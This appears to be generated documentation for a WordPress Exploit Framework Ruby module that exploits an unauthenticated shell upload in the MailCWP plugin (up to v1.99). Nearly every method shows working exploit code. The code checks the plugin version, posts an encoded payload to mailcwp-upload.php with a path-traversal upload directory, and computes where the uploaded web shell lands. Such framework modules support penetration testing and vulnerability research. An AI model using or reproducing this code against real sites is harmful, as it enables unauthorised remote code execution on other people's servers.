class Wpxf::Exploit::MailcwpUnauthenticatedShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 6 def initialize super update_info( name: 'MailCWP <= v1.99 Unauthenticated Shell Upload', author: [ 'Larry W. Cashdollar', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8090'], ['URL', 'http://www.vapid.dhs.org/advisory.php?v=138'] ], date: 'Jul 09 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 23 def check check_plugin_version_from_readme('mailcwp', '1.100') end
message_id()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 31 def message_id @message_id ||= Utility::Text.rand_numeric(3) end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 42 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_file_from_string('file', payload.encoded, payload_name) builder end
upload_request_params()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 35 def upload_request_params { message_id: message_id, upload_dir: '../../uploads' } end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 48 def uploaded_payload_location normalize_uri(wordpress_url_uploads, "#{message_id}-#{payload_name}") end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 27 def uploader_url normalize_uri(wordpress_url_plugins, 'mailcwp', 'mailcwp-upload.php') end